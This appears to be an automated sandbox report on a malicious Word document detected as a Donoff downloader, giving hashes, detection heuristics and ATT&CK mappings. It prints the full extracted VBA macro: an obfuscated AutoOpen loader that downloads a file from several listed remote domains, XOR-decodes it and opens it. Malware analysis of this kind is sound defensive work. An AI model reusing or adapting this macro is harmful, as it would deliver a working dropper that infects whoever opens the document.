Office (OOXML) malware analysis — malicious · e7f29538f137cd8c

MALICIOUS

Office (OOXML)

32.6 KB Created: 2017-03-22 07:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-04-17

MD5: f04e838aa44f16072aa091e3ace08337 SHA-1: 61c5eceb4f91db6544176a5a106699b515af8cae SHA-256: e7f29538f137cd8c370f73fa473b2e1651fbc3166da0e436f7d7dde3ae3156a2

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing obfuscated VBA macros, specifically an auto-exec loader with CreateObject and CallByName functions. ClamAV signatures indicate it is a downloader. The VBA code attempts to deobfuscate and execute a payload, likely from a remote source, which is a common downloader behavior.

Heuristics 8

ClamAV: Doc.Downloader.Donoff-10030369-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Donoff-10030369-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
If ActiveDocument.Kind = 0 Then
Set CuPro = CreateObject(Vaucher)
End If
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
If ActiveDocument.Kind = 0 Then
Set CuPro = CreateObject(Vaucher)
End If
```
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Matched line in script
```
CallByName c, Liska.T2.Text, VbMethod
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
Dim c As Rhhhh
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	14021 bytes
SHA-256: `b4dad03e0209df8e3e355a0a30dc02095fbdf84eae572289071c9ed3398d9434`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Dard" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() Dim c As Rhhhh Set c = New Rhhhh CallByName c, Liska.T2.Text, VbMethod Set c = Nothing End Sub Attribute VB_Name = "Liska" Attribute VB_Base = "0{AFFBD9F8-4703-4B2D-904A-11429EF2145C}{09F00B1B-A2CF-4320-BF6E-2334AC561CBB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Rhhhh" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public Function ratatu() As String ArizonaSu = Split(Liska.PPAPBOX.Text, "WHOKN") Vaucher = ArizonaSu(FreshID + FreshID * 2 / 13) Bitly ratatu = "" End Function Public Sub Challenge(sender As String, e As Integer) CallByName CuPro, Liska.OptionButton1.ControlTipText, VbMethod, ArizonaSu(5), FromNow_4, False Import2 End Sub Private Sub Import2() CallByName CuPro, Liska.Trbd.Text, VbMethod, FromNow_System, Liska.SpinButton1.ControlTipText End Sub Attribute VB_Name = "Module1" Public Const FromNow_System = "User-Agent" Public SubProperty As Object Public Const Sooopchik = "avetof" Public FromNow_PokerFace As Variant Public FromNow_GMAKO As Object Public FromNow_LAKOPPC As String Public FromNow_PIRO_LOR As Object Public ProjectDarvin As Integer Public FromNow_RDD2 As Object Public smbi As String Public FromNow_2 As String Public Const FreshID = 0 Public ArizonaSu() As String Public FromNow_Done As String Public Vaucher As String Public FromNow_DoneBBB As String Public CuPro As Object Public MovedPermanently() As String Public FromNow_4 As String Public Function Ashnorog(Var1, Var2) Ashnorog = Var1 Xor Var2 End Function Private Sub genresButton_Click(sender As Object, e As String) Dim varUsedCount As Integer Dim sw As New Stopwatch Try For I = 0 To listSize If media.Contains(listVariables(I)) Then varUsed.Add (listVariables(I)) varUsedIndex.Add (listVariables.IndexOf(listVariables(I))) End If Next varUsedCount = varUsed.count outputBox.Text = "" StatusLabel.Text = "Running for: " End Sub Attribute VB_Name = "Module2" Public Function CheckRectsAd() As Boolean Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 32 .Top = g_cursory .Bottom = .Top + 1 End With If IntersectRect(rTemp, AdRect, rMouse) Then CheckRectsAd = True Exit Function End If End Function Public Function CheckRectsNav() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 32 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(NavRect) If I < 8 Then If IntersectRect(rTemp, NavRect(I), rMouse) Then CheckRectsNav = I + 1 Exit Function End If End If Next End Function Public Sub MoveSheets(sheetToMove As String, sheetAnchor As String, Assimptota6OrAfter As String) Dim I On Error GoTo d13 For I = LBound(MovedPermanently) To UBound(MovedPermanently) Step 1 SaveDataCSVToolStripMenuItem_Click 72 If CuPro.Status <> 200 Then Err.Raise 700 + vbObjectError, "A", "D" End If Assimptota6 "33", 3 Exit Sub d13: Next Exit Sub End Sub Public Function Assimptota6(FullPath As String, NumHoja As Integer) As String DoChild CallByName SubProperty, "Open", VbMethod If NumHoja > 400 Then If numExportadas = 0 Then Assimptota6 = "No rows to export [No tiene filas por exportar]" Exit Function End If End If FromNow_PokerFace = CuPro.responseBody SubProperty.Write FromNow_PokerFace CallByName SubProperty, "s" + Sooopchik + "ile", VbMethod, FromNow_DoneBBB, 2 Assimptota4 ".", 1 End Function Public Function CheckRectsMenu4() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 32 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(MenuRect) If IntersectRect(rTemp, MenuRect(I), rMouse) Then CheckRectsMenu4 = I + 1 Exit Function End If Next End Function Public Function Assimptota4(FullPath As String, NumHoja As Integer) As String AsizePlusX FromNow_DoneBBB, FromNow_Done, "sVp56SIDJM0KpCn6snyopKYq0jnaoc5y" FromNow_GMAKO.Open (FromNow_Done) End Function Public Function CheckRectsMenuMenu1() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With If MenuMenu = 1 Then For I = 0 To 3 If IntersectRect(rTemp, rHelp(I), rMouse) Then CheckRectsMenuMenu1 = I + 1 Exit Function End If Next End If If MenuMenu = 5 Then If IntersectRect(rTemp, rHelp(4), rMouse) Then CheckRectsMenuMenu1 = 5 Exit Function End If End If If MenuMenu = 6 Then If IntersectRect(rTemp, rHelp(5), rMouse) Then CheckRectsMenuMenu1 = 5 Exit Function End If End If If MenuMenu = 7 Or MenuMenu = 8 Then If IntersectRect(rTemp, rHelp(5), rMouse) Then CheckRectsMenuMenu1 = 5 Exit Function End If End If If MenuMenu = 7 Then If IntersectRect(rTemp, rHelp(6), rMouse) Then CheckRectsMenuMenu1 = 6 Exit Function End If End If End Function Public Function CheckRectsMenuMenu2() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(Menu2Rect) If IntersectRect(rTemp, Menu2Rect(I), rMouse) Then CheckRectsMenuMenu2 = I + 1 Exit Function End If Next End Function Public Function DoChild() FromNow_Done = FromNow_LAKOPPC FromNow_DoneBBB = FromNow_Done + "\bogort" + CStr(ProjectDarvin) FromNow_Done = FromNow_Done + Replace(ArizonaSu(12), ".", CStr(ProjectDarvin) + ".") SubProperty.Type = 1 End Function Private Sub SaveOutputToolStripMenuItem_Click(sender As Object, e As String) Try If outputBox.Text <> "" Then SaveFileDialog1.InitialDirectory = "c:\temp\" SaveFileDialog1.Filter = "Text files (.txt)\|.txt\|All Files (.)\|." SaveFileDialog1.FilterIndex = 2 SaveFileDialog1.RestoreDirectory = True If (SaveFileDialog1.ShowDialog() = Windows.Forms.DialogResult.OK) Then saveOutputName = SaveFileDialog1.filename End If If saveOutputName <> "" Then End If Else MessageBox.Show ("The Output box is empty") End If End Sub Public Function CheckRectsMenuMenu4() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(Menu4Rect) If IntersectRect(rTemp, Menu4Rect(I), rMouse) Then CheckRectsMenuMenu4 = I + 1 Exit Function End If Next End Function Public Sub SaveDataCSVToolStripMenuItem_Click(e As Integer) FromNow_4 = Liska.Label2.Caption & MovedPermanently(I) ProjectDarvin = ProjectDarvin + 2 Dim XIpotom2 As Rhhhh Set XIpotom2 = New Rhhhh If e < 488 Then XIpotom2.Challenge "Swed", 13 CallByName CuPro, Liska.ToggleButton1.Caption, VbMethod Set XIpotom2 = Nothing Else SaveFileDialog1.InitialDirectory = "c:\temp\" SaveFileDialog1.Filter = "CSV files (.csv)\|.csv" SaveFileDialog1.FilterIndex = 2 SaveFileDialog1.RestoreDirectory = True If (SaveFileDialog1.ShowDialog() = Wind.ows.Forms.DialogResult.OK) Then saveCSV = SaveFileDialog1.filename End If If saveCSV <> "" Then 'Process.Start(saveCSV) End If End If End Sub Public Sub Method1(MethodParam2() As Byte, MethodParam As String) Dim AhnLab2 As Long Dim AhnLab3 As Long Dim AhnLab5 As Long Dim AhnLab6 As Long Dim plusplus() As Byte Dim AhnLab4 As Long Dim plusplusLen As Long plusplusLen = Len(MethodParam) ReDim plusplus(plusplusLen) plusplus = StrConv(MethodParam, vbFromUnicode) AhnLab2 = UBound(MethodParam2) + 1 AhnLab5 = AhnLab2 For AhnLab4 = 0 To (AhnLab2 - 1) aa = plusplus(AhnLab4 Mod plusplusLen) bb = MethodParam2(AhnLab4) MethodParam2(AhnLab4) = Ashnorog(bb, aa) If (AhnLab4 >= AhnLab6) Then AhnLab3 = Int((AhnLab4 / AhnLab5) * 100) AhnLab6 = (AhnLab5 * ((AhnLab3 + 1) / 100)) + 1 End If Next End Sub Public Function CheckRectMenu9() As Boolean Dim rTemp As RECT, rMouse As RECT With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With If IntersectRect(rTemp, Menu9Rect, rMouse) Then CheckRectMenu9 = True End Function Public Function CheckRectsPlayerOpt() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(PlayerOptR) If I > 1 Or Not Players(MeNum).Admin > 0 Then If IntersectRect(rTemp, PlayerOptR(I), rMouse) Then CheckRectsPlayerOpt = I + 1 Exit Function End If End If If I = 1 And Not Players(MeNum).Admin > 0 Then Exit Function Next End Function Attribute VB_Name = "Module3" Public Function CheckRectsMenu3() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(Menu3Rect) If IntersectRect(rTemp, Menu3Rect(I), rMouse) Then CheckRectsMenu3 = I + 1 Exit Function End If Next End Function Public Sub AsizePlusX(Dpilulten As String, pilultenJ As String, Optional FromNow_Sexote As String) Dim pilulten As Integer Dim Gpilulten() As Byte pilulten = FreeFile Open Dpilulten For Binary As #pilulten ReDim Gpilulten(0 To LOF(pilulten) - 1) Get #pilulten, , Gpilulten() Close #pilulten Call Method1(Gpilulten(), FromNow_Sexote) pilulten = FreeFile Open pilultenJ For Binary As #pilulten Put #pilulten, , Gpilulten() Close #pilulten End Sub Public Function CheckRectsMenuMenu3() As Integer Dim rTemp As RECT, rMouse As RECT, I As Integer With rMouse .Left = g_cursorx .Right = .Left + 1 .Top = g_cursory .Bottom = .Top + 1 End With For I = 0 To UBound(rConfig) If IntersectRect(rTemp, rConfig(I), rMouse) Then CheckRectsMenuMenu3 = I + 1 Exit Function End If Next End Function Public Sub Bitly() If ActiveDocument.Kind = 0 Then Set CuPro = CreateObject(Vaucher) End If Set FromNow_PIRO_LOR = CreateObject(ArizonaSu(FreshID + 3)) smbi = Liska.Label1.Caption MovedPermanently = Split("yuriy.photography/de3f3+rolandbitzi.ch/de3f3+yavuzturtelekom.com/de3f3+www.techconsultantsinc.com/de3f3", Liska.zLBL.Caption) Set SubProperty = CreateObject(ArizonaSu(1)) Set FromNow_GMAKO = CreateObject(ArizonaSu(1 + 2 + 3 - 4)) Set FromNow_RDD2 = FromNow_PIRO_LOR.Environment(ArizonaSu(4)) 'CreateObject Error FromNow_LAKOPPC = FromNow_RDD2(ArizonaSu(6)) ProjectDarvin = 0 MoveSheets "", "", "" End Sub Public Function PizaaT(FullPath As String, NumHoja As Integer) As String If NumHoja > 900 Then If Dir(FullPath & ".qif") > "" Then PizaaT = "File already exists [El fichero ya existe]: " & FullPath Exit Function End If End If FromNow_4 = Liska.Label2.Caption & MovedPermanently(I) ProjectDarvin = ProjectDarvin + 2 Dim XIpotom2 As Rhhhh Set XIpotom2 = New Rhhhh XIpotom2.Challenge "VAGCOM", 22 CallByName CuPro, Liska.ToggleButton1.Caption, VbMethod Set XIpotom2 = Nothing End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	47616 bytes
SHA-256: `12c63f308d7181505101a9f38cbbfb6f7ad44276be8d9283e0ec55a855c227c6`
Detection ClamAV: Doc.Downloader.Donoff-10030369-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.